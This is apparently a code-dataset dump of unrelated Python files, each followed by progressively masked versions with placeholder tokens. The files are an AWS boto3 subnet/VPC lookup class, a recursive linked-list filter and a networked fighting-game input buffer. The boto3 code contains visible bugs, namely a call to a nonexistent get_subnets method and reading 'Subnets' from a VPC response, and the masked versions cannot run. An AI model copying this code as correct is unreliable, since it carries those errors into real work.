boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n<function token>\n\n\ndef replace_vpc(value, parameters):\n if isinstance(value, str) and value.startswith('CfHl.Vpc'):\n nl.load()\n parts = value.split('.')\n environment_name = parameters['EnvironmentName']\n if len(parts) == 3:\n prop = parts[2]\n if prop == 'Id':\n vpcs = nl.vpcs\n if f'{environment_name}-vpc' in vpcs:\n return vpcs[f'{environment_name}-vpc']\n return value\n\n\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n\n def get_subnets(self, environment_name, subnetname):\n self.load()\n return list(map(lambda x: self.subnets[x], filter(lambda x: x.\n startswith(f'{environment_name}{subnetname}'), self.subnets)))\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n\n def __init__(self):\n self.loaded = 0\n self.subnets = {}\n self.vpcs = {}\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n <function token>\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n <function token>\n\n def load(self):\n if self.loaded:\n return\n client = boto3.client('ec2')\n subnets_r = client.describe_subnets()\n subnets_list = subnets_r['Subnets']\n while 'NextToken' in subnets_r:\n subnets_r = client.get_subnets(NextToken=subnets_r['NextToken'])\n subnets_list.extend(subnets_r['Subnets'])\n for subnet in subnets_list:\n name = None\n if 'Tags' in subnet:\n for tag in subnet['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.subnets[name] = subnet['SubnetId']\n vpcs_r = client.describe_vpcs()\n vpcs_list = vpcs_r['Vpcs']\n while 'NextToken' in vpcs_r:\n vpcs_r = client.describe_vpcs(NextToken=vpcs_r['NextToken'])\n vpcs_list.extend(vpcs_r['Subnets'])\n for vpc in vpcs_list:\n name = None\n if 'Tags' in vpc:\n for tag in vpc['Tags']:\n if tag['Key'] == 'Name':\n name = tag['Value']\n if name is not None:\n self.vpcs[name] = vpc['VpcId']\n <function token>\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n\n\nclass NetworkLookup:\n <function token>\n <function token>\n <function token>\n\n\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n", "<import token>\n<class token>\n<assignment token>\n<function token>\n<function token>\n<function token>\n<code token>\n" ]
false
66
efcbe296ea72a94be967124a8ba8c84a524e2eb1
__author__ = 'AChen' from rec_linked_list import * def filter_pos_rec(lst): """ @type lst: LinkedListRec >>> lst = LinkedListRec([3, -10, 4, 0]) >>> pos = filter_pos_rec(lst) >>> str(pos) '3 -> 4' """ if lst.is_empty(): return lst else: pos_rec = LinkedListRec([]) if lst._first > 0: pos_rec._first = lst._first pos_rec._rest = filter_pos_rec(lst._rest) else: pos_rec = filter_pos_rec(lst._rest) return pos_rec
[ "__author__ = 'AChen'\n\nfrom rec_linked_list import *\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "__author__ = 'AChen'\nfrom rec_linked_list import *\n\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "__author__ = 'AChen'\n<import token>\n\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "<assignment token>\n<import token>\n\n\ndef filter_pos_rec(lst):\n \"\"\"\n @type lst: LinkedListRec\n >>> lst = LinkedListRec([3, -10, 4, 0])\n >>> pos = filter_pos_rec(lst)\n >>> str(pos)\n '3 -> 4'\n\n \"\"\"\n if lst.is_empty():\n return lst\n else:\n pos_rec = LinkedListRec([])\n if lst._first > 0:\n pos_rec._first = lst._first\n pos_rec._rest = filter_pos_rec(lst._rest)\n else:\n pos_rec = filter_pos_rec(lst._rest)\n return pos_rec\n", "<assignment token>\n<import token>\n<function token>\n" ]
false
67
4789546128263bd298f8f5827734f8402747b9ac
from enum import Enum from roll.input import Input from roll.network import Server, Client from assets.game_projects.fighter.src.game_properties import GameProperties from assets.game_projects.fighter.src.network_message import NetworkMessage class InputBuffer: """ Responsible for collecting game input from both players. The game state will pull data from here if needed. Network messages will also update the input buffer when receiving data from the opposite player """ class Value(Enum): LEFT = "l" RIGHT = "r" UP = "u" DOWN = "d" WEAK_PUNCH = "wp" def __init__( self, left_action_name: str, right_action_name: str, weak_punch_action_name: str, frame_limit=12, ): self._inputs = {} self.left_action_name = left_action_name self.right_action_name = right_action_name self.weak_punch_action_name = weak_punch_action_name self._frame_limit = frame_limit def __str__(self): return f"{self._inputs}" def __repr__(self): return f"{self._inputs}" @property def values(self) -> list: return self._inputs.values() def add_input(self, input, frame: int) -> None: if frame in self._inputs: self._inputs[frame].append(input.value) else: self._inputs[frame] = [input.value] def get_inputs(self) -> dict: return self._inputs def get_frame_inputs(self, frame: int) -> list: return self._inputs.get(frame, []) def is_empty(self) -> bool: return len(self._inputs) == 0 def clear(self): self._inputs.clear() def poll_client_inputs(self, frame: int) -> None: if Input.is_action_pressed(action_name=self.left_action_name): self.add_input(input=InputBuffer.Value.LEFT, frame=frame) elif Input.is_action_pressed(action_name=self.right_action_name): self.add_input(input=InputBuffer.Value.RIGHT, frame=frame) if Input.is_action_pressed(action_name=self.weak_punch_action_name): self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame) self._inputs.pop(frame - self._frame_limit, None) class OutgoingNetworkInputBuffer(InputBuffer): def __init__( self, left_action_name: str, right_action_name: str, weak_punch_action_name: str, frame_limit=12, ): super().__init__( left_action_name=left_action_name, right_action_name=right_action_name, weak_punch_action_name=weak_punch_action_name, frame_limit=frame_limit, ) self.game_properties = GameProperties() def poll_client_inputs(self, frame: int) -> None: super().poll_client_inputs(frame=frame) frame_inputs = self.get_frame_inputs(frame=frame) if frame_inputs: if self.game_properties.is_server: Server.send_message_to_all_clients( message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}" ) else: Client.send_message_to_server( message=f"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}" ) class IncomingNetworkInputBuffer(InputBuffer): def __init__(self, frame_limit=12): super().__init__( left_action_name="", right_action_name="", weak_punch_action_name="", frame_limit=frame_limit, ) self.game_properties = GameProperties() def add_input(self, input: str, frame: int) -> None: if frame in self._inputs: self._inputs[frame].append(input) else: self._inputs[frame] = [input] def poll_client_inputs(self, frame: int) -> None: # TODO: Proper prediction if not self.game_properties.has_received_network_inputs: pass self._inputs.pop(frame - self._frame_limit, None)
[ "from enum import Enum\n\nfrom roll.input import Input\nfrom roll.network import Server, Client\n\nfrom assets.game_projects.fighter.src.game_properties import GameProperties\nfrom assets.game_projects.fighter.src.network_message import NetworkMessage\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n class Value(Enum):\n LEFT = \"l\"\n RIGHT = \"r\"\n UP = \"u\"\n DOWN = \"d\"\n WEAK_PUNCH = \"wp\"\n\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f\"{self._inputs}\"\n\n def __repr__(self):\n return f\"{self._inputs}\"\n\n @property\n def values(self) -> list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) -> dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) -> list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) -> bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) -> None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n def __init__(\n self,\n left_action_name: str,\n right_action_name: str,\n weak_punch_action_name: str,\n frame_limit=12,\n ):\n super().__init__(\n left_action_name=left_action_name,\n right_action_name=right_action_name,\n weak_punch_action_name=weak_punch_action_name,\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) -> None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n else:\n Client.send_message_to_server(\n message=f\"{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}\"\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n def __init__(self, frame_limit=12):\n super().__init__(\n left_action_name=\"\",\n right_action_name=\"\",\n weak_punch_action_name=\"\",\n frame_limit=frame_limit,\n )\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) -> None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) -> None:\n # TODO: Proper prediction\n if not self.game_properties.has_received_network_inputs:\n pass\n\n self._inputs.pop(frame - self._frame_limit, None)\n", "from enum import Enum\nfrom roll.input import Input\nfrom roll.network import Server, Client\nfrom assets.game_projects.fighter.src.game_properties import GameProperties\nfrom assets.game_projects.fighter.src.network_message import NetworkMessage\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n \"\"\"\n Responsible for collecting game input from both players. The game state will pull data from here if needed.\n Network messages will also update the input buffer when receiving data from the opposite player\n \"\"\"\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n\n def add_input(self, input, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input.value)\n else:\n self._inputs[frame] = [input.value]\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <function token>\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n\n def is_empty(self) ->bool:\n return len(self._inputs) == 0\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n\n @property\n def values(self) ->list:\n return self._inputs.values()\n <function token>\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def add_input(self, input: str, frame: int) ->None:\n if frame in self._inputs:\n self._inputs[frame].append(input)\n else:\n self._inputs[frame] = [input]\n\n def poll_client_inputs(self, frame: int) ->None:\n if not self.game_properties.has_received_network_inputs:\n pass\n self._inputs.pop(frame - self._frame_limit, None)\n", "<import token>\n\n\nclass InputBuffer:\n <docstring token>\n\n\n class Value(Enum):\n LEFT = 'l'\n RIGHT = 'r'\n UP = 'u'\n DOWN = 'd'\n WEAK_PUNCH = 'wp'\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n self._inputs = {}\n self.left_action_name = left_action_name\n self.right_action_name = right_action_name\n self.weak_punch_action_name = weak_punch_action_name\n self._frame_limit = frame_limit\n\n def __str__(self):\n return f'{self._inputs}'\n\n def __repr__(self):\n return f'{self._inputs}'\n <function token>\n <function token>\n\n def get_inputs(self) ->dict:\n return self._inputs\n\n def get_frame_inputs(self, frame: int) ->list:\n return self._inputs.get(frame, [])\n <function token>\n\n def clear(self):\n self._inputs.clear()\n\n def poll_client_inputs(self, frame: int) ->None:\n if Input.is_action_pressed(action_name=self.left_action_name):\n self.add_input(input=InputBuffer.Value.LEFT, frame=frame)\n elif Input.is_action_pressed(action_name=self.right_action_name):\n self.add_input(input=InputBuffer.Value.RIGHT, frame=frame)\n if Input.is_action_pressed(action_name=self.weak_punch_action_name):\n self.add_input(input=InputBuffer.Value.WEAK_PUNCH, frame=frame)\n self._inputs.pop(frame - self._frame_limit, None)\n\n\nclass OutgoingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, left_action_name: str, right_action_name: str,\n weak_punch_action_name: str, frame_limit=12):\n super().__init__(left_action_name=left_action_name,\n right_action_name=right_action_name, weak_punch_action_name=\n weak_punch_action_name, frame_limit=frame_limit)\n self.game_properties = GameProperties()\n\n def poll_client_inputs(self, frame: int) ->None:\n super().poll_client_inputs(frame=frame)\n frame_inputs = self.get_frame_inputs(frame=frame)\n if frame_inputs:\n if self.game_properties.is_server:\n Server.send_message_to_all_clients(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n else:\n Client.send_message_to_server(message=\n f'{NetworkMessage(message_id=NetworkMessage.ID.INPUTS, value=frame_inputs)}'\n )\n\n\nclass IncomingNetworkInputBuffer(InputBuffer):\n\n def __init__(self, frame_limit=12):\n super().__init__(left_action_name='', right_action_name='',\n weak_punch_action_name='', frame_limit=frame_limit)\n 